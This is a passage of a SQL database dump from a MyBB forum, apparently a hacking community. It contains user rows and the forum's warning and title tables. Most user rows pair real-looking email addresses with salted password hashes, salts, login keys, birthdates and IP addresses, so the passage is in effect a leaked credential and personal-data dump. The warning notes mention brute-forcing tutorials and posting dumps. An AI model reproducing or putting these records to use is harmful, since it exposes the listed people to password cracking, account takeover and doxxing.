'1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '24.191.244.156', '24.191.244.156', '415233180', '415233180', '', '993', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('322', 'BaneKitty (LEGIT)', '3acd5cfeade332417f932148726c3d14', 'FEtQQFu5', 'gV8RqVVM5df5ks5BpsBVbIOh7RdUSNdmIo48RYKnhfMUrkZqPA', 'fiestyambermartin@hotmail.com', '0', '', '', '', '2', '', '0', '', '1352132581', '1352132581', '1352132581', '0', '', '0', '', '', '', '5-10-1988', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '174.60.173.69', '', '-1371755195', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('323', 'moruzaks', 'e007f7d2c782c28b2f431f8bb7d4edaa', 'mziHEeWv', '7OyO9N5Ey4oXaZ6iT8DkPzYqEPbV34dCyqQGFRMLBpDWFRthyR', 'moruzaks@gmail.com', '3', '', '', '', '2', '', '0', '', '1352159268', '1352479043', '1352170309', '1352476992', '', '0', '', '', '', '24-10-1987', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '196.46.245.49', '216.119.145.99', '-1003555535', '-663252637', '', '12167', '1', '3', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('324', 'Purps™', '7b84cff44ed1ba5b7bb0962e95812e61', '6PEO1dlw', 'PPdbmvLC9mb8n3F8vi4ZOITPVAoayOBSl5r6vr9YRKcIiXEB8J', 'purpstm@gmail.com', '4', '', '', '', '2', '', '0', '', '1352172222', '1352747822', '1352708941', '1352265009', '', '0', '', '', '', '20-4-1990', 'all', '', '0', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-8', '0', '0', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '3', '67.181.154.90', '67.181.154.90', '1135975002', '1135975002', '', '1957', '1', '6', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('325', 'Perfection', 'ecccc16250c5260fbc9aa6ba9e76299d', 'iMqLMtQb', 'anqvxvBuIPO4TxuqsZKpiCHX64jRC266CluxH8XiRTFeBQiVPJ', 'kenneth-huynh@hotmail.com', '4', '', '', '', '2', '', '0', '', '1352177143', '1352684774', '1352302582', '1352296702', '', '0', '', '', '', '16-7-1995', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-8', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '107.204.89.253', '108.254.243.128', '1808554493', '1828647808', 'english', '4177', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('327', 'dublejayj', 'c41c50a083571bd30b8a08569e6489c0', 'Iz8WlqIK', '3JoVnPRkS54VxkDQvjCPv5WkHs2lHDvvtjmYRqjAOjDyafthMt', 'randomninjaman@hotmail.com', '0', '', '', '', '2', '', '0', '', '1352245900', '1352246107', '1352245900', '0', '', '0', '', '', '', '10-6-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '1', '1', '', '', '0', '0', '0', '0', '', '', '', '82', '0', '0', '72.95.249.219', '72.95.249.219', '1214249435', '1214249435', 'english', '207', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('329', 'Weeknd', 'a718ccebce94ae2005adeb4c154c798c', 'ir7RvWcd', '23lFSslaAuKx9iPObtUGJQzOa9xAaW1ait16VUcFhwsCcdVdEz', 'o.c.o.b.r.a@aol.com', '0', '', '', '', '2', '', '0', '', '1352371108', '1352377741', '1352372172', '0', '', '0', '', '', '', '3-3-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '68.170.228.35', '68.170.228.35', '1152050211', '1152050211', '', '1131', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('330', 'Dage', 'fed34d2349b916345d9712892ce0d436', 'njECUSRq', 'YqcHEZ5T8QhFgWFIqgbzFrGPyNcNZtLOsHDjGoTKJErOV5nddr', 'tonitonitt@net.hr', '1', '', '', '', '2', '', '0', '', '1352373250', '1352373384', '1352373250', '1352373378', '', '0', '', '', '', '31-1-1992', 'all', '', '0', '0', '0', '0', '1', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '78.3.250.129', '78.3.250.129', '1308883585', '1308883585', '', '134', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('331', 'allaine99', 'c52ee2ffdae6f8143cb79f7ae8cf59f0', 'FGetyRnh', '5bwxw4PaoEqc8R7EoIkG2bAx21MigZvZsOEwnVawbbrksV8d4R', 'cebusouthnetwork@gmail.com', '0', '', '', '', '2', '', '0', '', '1352408528', '1352409541', '1352408528', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '195.60.76.223', '195.60.76.223', '-1019458337', '-1019458337', '', '1013', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('332', 'Regac Kebabistan', '383ef9bf8bb3a3191f9fbc86134c9fb0', '3gyHneKz', 'hO1V7DLw3OwdXZ9vOgEzauAlnmpgzffMa1OPm4qGY6KLgDQQDJ', 'piqueroz@gmail.com', '0', '', '', '', '2', '', '0', '', '1352412694', '1352548132', '1352443682', '0', '', '0', '', '', '', '21-9-1993', 'all', '', '0', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '83.94.224.108', '2.130.82.35', '1398726764', '42095139', '', '1512', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('333', 'illest', '547be1b8f00467044fad7af64c8b3ebf', 'qr4T4MTG', '96UD4mYMgq97BlWWSt1lAIt77Z1es1MMqIDPXzK9MB47uivv3p', 'smasher7051@gmail.com', '6', '', '', '', '2', '', '0', '', '1352413278', '1352625017', '1352478459', '1352431355', '', '0', '', '', '', '30-1-1996', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-8', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '1', '0', '65.102.190.80', '71.231.38.67', '1097252432', '1206330947', '', '3864', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('334', 'Centagon', '4c89e6a8f6c1f72b91f03492e951eb66', 'teFFT1Vg', 'goJA2cZkHRj66mShbJR22sbKCp1yDkShBGDcZnqg2GOnflxotT', 'Centagon@outlook.com', '0', '', '', '', '2', '', '0', '', '1352431527', '1352757778', '1352434176', '0', '', '0', '', '', '', '1-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '333', '0', '0', '107.205.69.168', '173.245.50.14', '1808614824', '-1376439794', '', '1993', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('335', 'loser386', '9afb6a8fa1996057847276d652f7c0dd', 'igwfpicB', 'nEgjTpbqtgUp8mXGOpOEryup13nCAcP8btoMIvrq5Dd2oRSUO9', 'failed.project@yahoo.com', '1', '', '', '', '2', '', '0', '', '1352449441', '1352454409', '1352452397', '1352452340', '', '0', '', '', '', '21-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '110.36.19.190', '110.36.19.190', '1847858110', '1847858110', '', '535', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('336', 'GoodBoy', '5371a360416d62c039669709b4a15674', 'ma9zSLUU', 'bZBYhvSXoFgACENsxF8YabOmU8KtBwI5DszjGnlJdNaZ3VhJHD', 'mr.smithivan@gmail.com', '0', '', '', '', '2', '', '0', '', '1352468655', '1352470846', '1352469487', '0', '', '0', '', '', '', '28-9-1979', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '0', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '94.0.114.45', '94.0.114.45', '1577087533', '1577087533', '', '1160', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('337', 'm4dh4ck3r', '77fd02d4069bd300cdbad942dec10fd5', 'XlTCdKjY', 'mn9HModUWG9GcmfdOZa8V7CoBFHoGTAYtAtU9cZyNSHJ6Vr6iv', 'superhero619@gmail.com', '0', '', '', '', '2', '', '0', '', '1352490604', '1352490604', '1352490604', '0', '', '0', '', '', '', '19-7-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '61', '0', '0', '122.174.92.160', '', '2058247328', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('338', 'TauAssassin', '498e3e56705bf535126eafccdd19973a', 'P8RDkQMU', 'hvXqoNNVSRCNg2FcVcCFIyKyWfu93JjFzLuNqiO3qCl3UbO3nR', 'tau_assassin@hotmail.com', '0', '', '', '', '2', '', '0', '', '1352504112', '1352504168', '1352504112', '0', '', '0', '', '', '', '1-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '173.206.71.165', '173.206.71.165', '-1378990171', '-1378990171', 'english', '56', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('339', 'A??????™', 'f3902ee245c3e66783cd4f043c13ea16', 'Qhmla5dJ', 'BhTQhxeaRG9jCBNFEtcMnY5FIXKfoglUr8jsTBmLqNCkpQzvSk', 'anthraxx@live.co.uk', '0', '', '', '', '2', '', '0', '', '1352508374', '1352517104', '1352511920', '0', '', '0', '', '', '', '4-1-1994', 'all', '', '1', '0', '2', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '81.96.99.120', '81.96.99.120', '1365271416', '1365271416', '', '111', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('341', 'bouabda', 'e5c74874d0218818b39ccd2f10627bb2', 'ddC3eD9O', 'oWRM2YP2XopW3wNnZsoPyx6UtouLihiPNLXm9CWK6jgTfO9Rah', 'waelbouabda@gmail.com', '2', '', '', '', '2', '', '0', '', '1352555145', '1352555731', '1352555145', '1352555433', '', '0', '', '', '', '17-10-1992', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '197.6.136.191', '197.6.136.191', '-989427521', '-989427521', '', '586', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('340', 'EliteDanz', '201d5478ac17a8916c6b324008a2a8b9', 'jvxlfjZl', '21jx4YZv8E1XKrRNeNEVNkwTaEuCOLaSkSCKL11h6dwc3VvoQW', 'danny_smith2026@yahoo.co.uk', '0', '', '', '', '2', '', '0', '', '1352544776', '1352544963', '1352544776', '0', '', '0', '', '', '', '16-3-1996', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '94.13.75.42', '94.13.75.42', '1577929514', '1577929514', '', '187', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('342', 'Squirt1971', '566d870435fd5cdcfeabd1e064279a95', 'XRG562Mz', 'qjOij4y8vew8O96I5clYsKwjbaNXNvECqVxMQb91AAuLRlsXSN', 'basketball8001@hotmail.com', '4', '', '', '', '2', '', '0', '', '1352571709', '1352756278', '1352685065', '1352606030', '', '0', '', '', '', '5-6-1990', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '96.21.227.16', '96.21.227.16', '1612047120', '1612047120', '', '1304', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('345', 'ZetaHunter', 'b3c96b4444232fd9572599272e3d1e50', 'D82ssS4O', 'lX1xvy1VwXToU3H4QvWfWteMvlqRJK6F1z1wovJnNPu2LRuVB4', 'nirajneek@gmail.com', '1', '', '', '', '2', '', '0', '', '1352654797', '1352656392', '1352654797', '1352654955', '', '0', '', '', '', '24-12-1981', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '116.203.56.36', '116.203.56.36', '1959475236', '1959475236', '', '1595', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('343', 'vashafi', 'dc95c20c2e33c735e837fd3584b2c885', 'dryenown', '1xaA7VUGiJcQBAFMCM979jSs5iV4GengbIqERri4OyhTpDurl3', 'vashafi@gmail.com', '0', '', '', '', '2', '', '0', '', '1352608808', '1352609966', '1352608808', '0', '', '0', '', '', '', '1-10-1987', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '14.194.176.168', '14.194.176.168', '247640232', '247640232', '', '1158', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('344', 'Goolge+', '13d0b3d1593a5de0407e78f43efa9bcd', 'nXRQO18T', 'HhtzXQZGb5zjX9CKrDJb23mHlG7Fbjnunuf2yUU1U4NuFMehG6', 'google_kimtien@yahoo.com', '0', '', '', '', '2', '', '0', '', '1352622844', '1352622844', '1352622844', '0', '', '0', '', '', '', '7-11-1991', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '7', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '123.23.218.116', '', '2065160820', '0', 'english', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); DROP TABLE IF EXISTS mybb_usertitles; CREATE TABLE mybb_usertitles ( utid smallint(5) unsigned NOT NULL auto_increment, posts int(10) unsigned NOT NULL, title varchar(250) NOT NULL, stars smallint(4) NOT NULL, starimage varchar(120) NOT NULL, PRIMARY KEY (utid) ); INSERT INTO mybb_usertitles VALUES('1', '0', 'Alpha', '1', ''); INSERT INTO mybb_usertitles VALUES('2', '50', 'Beta', '2', ''); INSERT INTO mybb_usertitles VALUES('3', '250', 'Gamma', '3', ''); INSERT INTO mybb_usertitles VALUES('4', '1000', 'Delta', '4', ''); INSERT INTO mybb_usertitles VALUES('5', '2500', 'Epsilon', '5', ''); INSERT INTO mybb_usertitles VALUES('6', '5000', 'Zeta', '6', '{theme}/star.gif'); INSERT INTO mybb_usertitles VALUES('7', '10000', 'Sigma', '7', '{theme}/star.gif'); DROP TABLE IF EXISTS mybb_warninglevels; CREATE TABLE mybb_warninglevels ( lid int(10) unsigned NOT NULL auto_increment, percentage int(3) NOT NULL, action text NOT NULL, PRIMARY KEY (lid) ); INSERT INTO mybb_warninglevels VALUES('1', '95', 'a:3:{s:4:\"type\";i:1;s:9:\"usergroup\";i:7;s:6:\"length\";i:15552000;}'); INSERT INTO mybb_warninglevels VALUES('2', '70', 'a:2:{s:4:\"type\";i:3;s:6:\"length\";i:1209600;}'); INSERT INTO mybb_warninglevels VALUES('3', '80', 'a:2:{s:4:\"type\";i:2;s:6:\"length\";i:1296000;}'); INSERT INTO mybb_warninglevels VALUES('4', '90', 'a:3:{s:4:\"type\";i:1;s:9:\"usergroup\";i:10;s:6:\"length\";i:604800;}'); DROP TABLE IF EXISTS mybb_warnings; CREATE TABLE mybb_warnings ( wid int(10) unsigned NOT NULL auto_increment, uid int(10) unsigned NOT NULL, tid int(10) unsigned NOT NULL, pid int(10) unsigned NOT NULL, title varchar(120) NOT NULL, points int(10) unsigned NOT NULL, dateline bigint(30) NOT NULL, issuedby int(10) unsigned NOT NULL, expires bigint(30) NOT NULL, expired int(1) NOT NULL, daterevoked bigint(30) NOT NULL, revokedby int(10) unsigned NOT NULL, revokereason text NOT NULL, notes text NOT NULL, PRIMARY KEY (wid) ); INSERT INTO mybb_warnings VALUES('1', '4', '8', '0', '', '10', '1340001003', '1', '1340433003', '1', '1340001216', '1', 'test completed.', 'test'); INSERT INTO mybb_warnings VALUES('2', '21', '0', '0', 'Test', '75', '1343932836', '20', '1343936436', '1', '0', '0', '', 'Test.'); INSERT INTO mybb_warnings VALUES('3', '21', '0', '0', 'Test', '2', '1344300771', '20', '1344304371', '1', '0', '0', '', 'Test'); INSERT INTO mybb_warnings VALUES('4', '4', '1', '0', '', '20', '1344902259', '1', '1345593459', '1', '1344902364', '1', 'Test expired. ', 'knm'); INSERT INTO mybb_warnings VALUES('5', '4', '6', '0', '', '40', '1344902308', '1', '1345766308', '1', '1344902378', '1', 'test completed. ', 'idk'); INSERT INTO mybb_warnings VALUES('6', '86', '10', '0', '', '30', '1345556902', '1', '1346766502', '1', '0', '0', '', 'Posting DUMPS'); INSERT INTO mybb_warnings VALUES('7', '86', '10', '0', '', '30', '1345556925', '1', '1346766525', '1', '0', '0', '', 'Again Posting DUMPS'); INSERT INTO mybb_warnings VALUES('8', '4', '14', '0', '', '20', '1345934760', '1', '1346453160', '1', '0', '0', '', 'No credits. '); INSERT INTO mybb_warnings VALUES('9', '127', '1', '0', '', '20', '1345936152', '1', '1346627352', '1', '1345936203', '1', 'He is new. ', 'Adult Content'); INSERT INTO mybb_warnings VALUES('10', '54', '9', '1196', '', '20', '1346117903', '1', '1346809103', '1', '0', '0', '', 'Spamming with hire me for admin in posts. '); INSERT INTO mybb_warnings VALUES('11', '67', '0', '0', 'Stop making false reports.', '1', '1346429556', '20', '1346515956', '1', '0', '0', '', 'Entering false reports.'); INSERT INTO mybb_warnings VALUES('12', '82', '15', '1680', '', '15', '1347122783', '1', '1347727583', '1', '0', '0', '', 'Low Quality Posting'); INSERT INTO mybb_warnings VALUES('13', '53', '2', '1871', '', '10', '1347545798', '61', '1348150598', '1', '0', '0', '', 'Try to solve problems in a different way, instead of telling people to shut up and getting angry for no reason.'); INSERT INTO mybb_warnings VALUES('14', '82', '9', '0', '', '20', '1347737704', '61', '1348428904', '1', '0', '0', '', 'No spam posts Please.'); INSERT INTO mybb_warnings VALUES('15', '5', '14', '0', '', '20', '1349234697', '1', '1349753097', '1', '0', '0', '', 'No credits on the \"How to bruteforce VPS\" tutorial.'); INSERT INTO mybb_warnings VALUES('16', '3', '2', '3306', '', '10', '1349395907', '61', '1350000707', '1', '1349494667', '1', 'Revoked because they requested another chance. ', 'Calm down. It\'s embarrasing..'); INSERT INTO mybb_warnings VALUES('17', '224', '0', '0', 'Promoting Different Site.', '15', '1350152353', '61', '1350757153', '1', '0', '0', '', 'You are not allowed to promote a Different hacking site, No matter what.'); INSERT INTO mybb_warnings VALUES('18', '214', '0', '0', 'Vulgar Adult content ', '50', '1350647924', '61', '1353239924', '0', '0', '0', '', 'Disgusting. '); INSERT INTO mybb_warnings VALUES('19', '257', '11', '6478', '', '15', '1351355851', '1', '1351960651', '1', '0', '0', '', 'Constantly posting suggestions in the announcements section.'); INSERT INTO mybb_warnings VALUES('20', '53', '15', '0', '', '15', '1352599233', '61', '1353204033', '0', '0', '0', '', 'Second time.'); DROP TABLE IF EXISTS mybb_warningtypes; CREATE TABLE mybb_warningtypes ( tid int(10) unsigned NOT NULL auto_increment, title varchar(120) NOT NULL, points int(10) unsigned NOT NULL, expirationtime bigint(30) NOT NULL, PRIMARY KEY (tid) ); INSERT INTO mybb_warningtypes VALUES('1', 'Adult Content', '20', '691200'); INSERT INTO mybb_warningtypes VALUES('2', 'Nonsense', '10', '604800'); INSERT INTO mybb_warningtypes VALUES('3', 'Profile Violation', '15', '604800'); INSERT INTO mybb_warningtypes VALUES('4', 'Cross Posting', '20', '777600'); INSERT INTO mybb_warningtypes VALUES('5', 'Reputation Abuse', '25', '1209600'); INSERT INTO mybb_warningtypes VALUES('6', 'Threat or Harassment ', '40', '864000'); INSERT INTO mybb_warningtypes VALUES('7', 'Personal Data', '15', '720000'); INSERT INTO mybb_warningtypes VALUES('8', 'Off topic or Unrelated', '10', '432000'); INSERT INTO mybb_warningtypes VALUES('9', 'SPAM', '20', '691200'); INSERT INTO mybb_warningtypes VALUES('10', 'Disallowed Blackhat Activity', '30', '1209600'); INSERT INTO mybb_warningtypes VALUES('11', 'Wrong Forum', '15', '604800'); INSERT INTO mybb_warningtypes VALUES('12', 'Infected download or link', '25', '1209600'); INSERT INTO mybb_warningtypes VALUES('13', 'Donation Begging', '10', '604800'); INSERT INTO mybb_warningtypes VALUES('14', 'Leeching', '20', '518400'); INSERT INTO mybb_warningtypes VALUES('15', 'Low Quality Posting', '15', '604800');